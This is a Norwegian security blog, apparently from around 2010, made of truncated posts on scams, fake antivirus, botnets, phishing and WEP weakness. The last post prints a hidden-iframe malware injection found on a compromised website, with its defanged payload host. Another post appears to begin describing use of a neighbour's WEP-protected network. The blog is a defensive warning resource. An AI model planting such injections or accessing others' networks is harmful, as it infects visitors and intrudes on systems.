Nigeriasvindel har vært kjent fra 1970-tallet (da i form av vanlig brev, telex eller telefax). Siden har det spredt seg via internett.
Det nye er tydeligvis personlig oppmøte. Nylig ble fire personer lurt til å utbetale 535.000 kroner.
Når noe virker for godt til å være sant, er det mest sannsynlig det.
Les hele saken i Agderposten
Hele tiden forsøker hackere i mer eller mindre organiserte former å hente ut informasjon fra fremmede datamaskiner og bruke dem til kriminalitet.
- Økningen de siste årene har vært formidabel. Hver time oppdages 1.800 nye trusler mot datamaskiner og nettverk via internett. For tre år siden var dette tallet så vidt over 100, sier en sikkerhetsekspert i Telenor Security Operation Centre (TSOC).
Største trusler i 2010 vil fortsatt være:
Drive-by: Falske og ofte skjulte henvisninger på
For noen år siden ville alle varsellamper ha lyst når en slik epost kom. I dag, med et utbredt forbrukmønster knyttet til div. nettbutikker, er det ikke nødvendigvis slik at en slik melding straks får varsellampen til å lyse.
For mitt vedkommende venter jeg faktisk på en pakke fra utlandet. Om den blir levert med UPS vet jeg ikke, - kanskje.
Uansett, en rask sjekk av vedlegget som utga seg for å være et dokument, viste ved utvidet filendelseinfo, at dette var en .exe-fil.
Siden 2007 har Energizer vært uvitende distributør av en Trojan som en del av deres Energizer Duo programvare. Filen Arucer.dll, som ble antatt å være en legitim fil som brukes av USB-batteriladere, ble i stedet en trojaner med bakdørfunksjon som tillater ekstern tilgang til datamaskin.
Det har alltid vært tenkt at Arucer.dll var et legitim fil som kunne sjekke status på batteriene i batteriladeren når denne var koblet til datamaskinen. Cert har oppdaget at denne filen istedet kan være en b
De tradisjonelle kataloghaiene er på retur, men næringslivet er utsatt for nye former for bedrageri.Varslingslisten (varslingslisten.no) fra Næringslivets Sikkerhetsråd hjelper bedriftene å avsløre svindelforsøk.
Fra 1. mars er varslingslisten lagt om slik at den legger mer vekt på metodene enn på aktørene i svindelmarkedet.
En av de nyere metodene som beskrives på Varslingslisten er at bedriften får en oppringning av en selger, ofte fra Sverige.
– De er gjerne aggressive på te
Flere av mine kompiser har kjøpt seg Mac, og det er utvilsomt en lekker sak. Problemet er imidlertid at det argumentet som de alle bruker på hvorfor de heller vil bruke mye penger på en mac framfor å få en pc som brenner asfalt for samme pris, er at de er lei av krasj og malware.
Om Mac kræsjer mindre/aldri, det vet jeg lite om, men om de tror at Mac er malwarefritt, vil de få seg en overraskelse. Pr dags dato finnes det kanskje ikke virus? for mac-systemet, men en rekke trojanere som skaper
Selv om Microsoft Security Essentials er på vei til å erstatte Windows Defender, så er programmet fortsatt et alternativ som beskyttelse mot spyware og annet rammel.
Dette blir selvfølgelig utnyttet av de som ønsker å tjene penger på å selge falske sikkerhetsprogrammet. Derfor er det nylig lansert en falsk utgave som går under navnet Windows Defender 2010 (NB!Falsk nettside: hxxp://pcwin-live.com/ )
Spansk politi har anholdt tre menn som de mener står bak et stort botnett. Ifølge spansk politi anses mennene å stå bak hackerringen Mariposa, som har infisert pc-er i 130 land.
Mariposa botnettet ble tatt offline i desember etter en aksjon som involverte bla. FBI og Guardia Civil i Spania. Botnettet ble brukt til å stjele sensitiv informasjon fra uvitende brukere, inkludert brukernavn, passord, innloggingsdetaljer for nettbank og kredittkortdata.
Den spanske gjengen leide ut deler
I 2009 hadde DNB-NOR alene 439 saker, en økning på 96% fra året før. 1395 mobilabonnement bestilt med falsk ID i 2009 hos Telenor.
For å kunne opptre som deg trenger ID-tyven mest mulig informasjon. Dette er noen av metodene ID-tyven bruker:
Stjele kredittkort eller bankkort
Stjele fra postkasse eller søppel
Tappe mobiltelefon eller PC
Phishing (lure fra deg persondata)
Hacking
Virus
Søk på internett
Bestillingstyveri
Stjele PIN-koder og passord
Sosial manipulering
Phishing er en betegnelse på digital snoking eller fisking etter sensitiv informasjon, som passord eller kredittkortnummer.
Svindlerne kan lure deg til å gi i fra deg informasjon på flere måter. For eksempel kan de oppfordre deg til å svare på en e-post med falsk svaradresse slik at de selv mottar informasjonen fra deg.
En annen metode er å oppgi en lenke i e-posten som leder til en falsk nettside der du blir bedt om å gi opplysninger. Nettsiden kan se ekte ut. Under er en knipe med sl
I et tidligere innlegg, nevnte jeg at det i forbindelse med 'større' hendelser, eks. OL i Vancouver, får man gjerne en oppblomstring av søketreff som leder til malware.
Symantec har et eksempel knyttet til jordskjelvet som skjedde i Chile 27.feb. Et googlesøk kort tid etter hendelsen, ga treff som ledet til nedlasting av falske antivirusprogarm.
Men, som Symantec sier: "Selv om vi ikke kan beskytte deg mot jordskjelv eller tsunamier, kan vi i alle fall hjelpe deg å unngå en ny bølge av s
Så lenge man gjør det mot sin egen ruter så trenger man ikke å få dårlig samvittighet, men må man så må man...
Av en eller annen grunn trynet husets trådløse ruter (Linksys) og jeg fikk ikke noe liv i den igjen. Med 4 pc'er i hus som alle går på trådløst, ble det krisestemning blant ungdommen. Hvordan skal vi klare oss uten msn, facebook, go supermodel og diskusjon.no - helt til i morgen?
En rask sjekk viste at det var et WEP-kryptert nettverk ganske nære - ja det viste seg at det var na
Når vi er så godt i gang med å advare mot kopier av kjente merkevarer (Avira, MSE etc.), så kan vi like godt slenge på en som prøver å utnytte Microsoft Live sitt gode navn og rykte.
Live Enterprise Suite. For bare 89.95 dollar vil du få et program som beskytter deg mot det meste. Synd at det ikke finnes et program som kan beskytter brukeren mot seg selv, men vi får stole på at antivirusprogrammet vi har på pc'n sier ifra når vi gjør noe dumt
Det florerer av dem og i forrige blogginnlegg ble botnettet Spy-Eye nevnt. Dette brukes bla. til å spre slike program. Frustrasjon for brukeren, gode penger til botnett-eieren.
Hardware nevnte nylig et program som 'etterligner' Microsoft Security Essentials". Det kalles noe navnelikt - Security Essentials 2010 (se bilde)
Navnelikhet er noe som ofte brukes for å forvirre en bruker. Avira, som tilbyr et av de beste gratisantivirusprogrammene opplever også slik etterligning.
Under ser d
Det er ikke bare i det vanlige næringslivet det konkurreres, men også blant programmerere på den mørke siden (black hat). Det finnes flere store botnet i omløp. Det mest kjente er antakelig Zeus, som både i utstrekning og økonomisk kanskje er det største.
På et undergrunnsforum kom jeg over følgende innlegg:
Prisen på denne boten (base bundle) på nåværende tidspunkt er 500 USD. Boten inneholder:
Formgrabbing: en avansert keyloggingsmetode for å fange webskjema data støtter Firef
I dag så jeg et dansk program som het ”Det usikre internet” (NRK 2, sendt på DR i 2009 (velg 6/5)). Der ble det vist hvor lett det bla. er å dekryptere WEP, som fortsatt mange i dag benytter på sin trådløse forbindelse. Mange krypterer ikke i det hele tatt.
Det er stadig vanligere at man har flere pc’er i hus, gjerne med en sentral mediaserver. Har du tilgang til nettverket, vil du også få tilgang til de delte ressursene. Enda en grunn til at man ikke bør være slapp med sikkerheten på sitt
Med vinter-OL i nyhetsbildet de siste par ukene, har malware profitører som vanlig arbeidet hardt for å få mest mulig oppmerksomhet.
Deres strategi er enkel: opprett ondsinnede websider med søkeord som sannsynligvis vil komme opp i nyhetsrelaterte søk knyttet til OL. Jo raskere en slik side kan settes opp, jo bedre sjanse har den til å få en høy søkemotor-rangering. Selv om det normalt ikke er så mange linker til slike sider fra andre kilder, er det svært sannsynlig at om malwareprofitørene
Comodo, som lager sikkerhetsprogrammer og som bla. har en brannmur i verdensklassen, har gitt ut en nettleser bygd på Chromium. Nettleseren ser lik ut som Google Chrome, men Comodo har hatt større fokus på personvern og sikkerhet. I dette ligger det at man har fjernet funksjoner som Comodo anser som en sikkerhetsrisiko i Chrome og lagt til funksjoner som skal gi bedre sikkerhet for brukeren.
Comodo Dragon er selvsagt gratis og kan lastes ned fra Comodo.com
FIRE er et system som automatisk identifisere og avdekke organisasjoner og Internett-leverandører som viser vedvarende, skadelig atferd. Dette kan være servere som enten er hacket eller som bevist bedriver med spam, phishing og exploits (skadelig kode og nedlasting av malware).Denne informasjonen kan benyttes av ISP'er til å blokkere disse ip'ene slik at disse serverne blir isolert.Som illustrasjonen viser, så er det rimelig mange servere som er avdekket. I Europa er det vanligste exploits-serve
I datasikkerhetssammenheng er "social engineering" et begrep som knytter seg til det å lure til seg informasjon som andre egentlig ikke ønsker å formidle eller å få noen til å utføre handlinger mot bedre viten. Denne formen for 'hacking' er i mange sammenhenger langt vanligere enn å bryte seg inn i eller bruke andre hacker teknikker for å få tilgang til data.
At blogger og nettsamfunn har 'tatt av', har også malware-forfatterene registrert. Et typisk angrepsscenario innebærer at angriperne i
Med mange produkter på markedet samt lovnader om at ”vi er best…”, så er det ikke lett å velge det ’beste’ anti-programmet og som i tillegg kan holde det det lover. Det mest aktuelle spørsmålet er kanskje om det overhode finnes anti-program som kan holde pc’n fri for malware.
Min påstand er nei. Fra egenerfaring og tester er det helt klart mangler ved alle de anti-programmene som finnes på markedet i dag. Forklaringen er ganske enkel – man kan ikke finne/stoppe skadelige programmer/kode som
Ja, slik var overskriften på en artikkel som sto på VG Nett nylig. For en som bruker litt tid på det samme feltet, så kan jo dette være interessant lesning - tenkte jeg.
Artikkelen var skrevet i forbindelse med "Den nasjonale sikkerhetsdagen". Og hos Norsk Senter for Informasjonssikring (NorSIS) har man tre enkle steg som vil bidra til økt sikkerhet på datamaskinen din. Alle kan gjennomføres rask, enkelt og gratis. Etter å ha tatt stegene vil maskinen din være oppdatert, virusfri og bedre e
Hvorfor backup?
Det opplagte er at når harddisken ryker, så har du i allefall tatt vare på dokumenter, bilder etc. som du anser som verdifull. Problemet er kanskje at de fleste ikke tenker på dette - overhode. Eller, man tenker på det i ny og ne men får aldri gjort noe med det - før man sitter der og irriterer seg fordi harddisken krasjet.
Nå finnes det andre gode grunner til å ta backup også - virus.
Virus eller malware har i bunn og grunn ikke vært særlig skadelig med tanke på tap av
Den rimelig kjente ormen Conficker var programmert til å endre seg 1.april. Noen av endringene var kjent (bla. generering av 50 000 domenenavn). Hva den nye varianten egentlig vil gjøre er imidlertid ikke helt kjent men det som er helt opplagt er at det er et botnett som er bygd opp med anslagsvis 10 mill pc'er.
Selv om vi skal ta denne type trusler alvorlige, så er det vel slik at denne type ting heller ikke er fredet for spøk - spesielt 1.april
Samtidig så var det en liten motreaksjo
Selv for en dyrevenn så er ikke alt som lukter hund, bra. Nettstedet 'hxxp://www.omplasseringavhunder.no' er fortiden infisert med malware som prøver å utnytte kjente sårbarheter knyttet til div. program.
Javascript-injeksjonen, som er lagt inn på siden, henter info fra:
<iframe id="1e321863e201f914ad22f7669a83199d" name="d9660710064c187e1f82343133ab4fe1" width=1
height=1 frameborder=0 src="hxxp://thehugetitstop.cn/dontstop.html"></iframe>
Via redirect :
hxxp://vpsspeedi
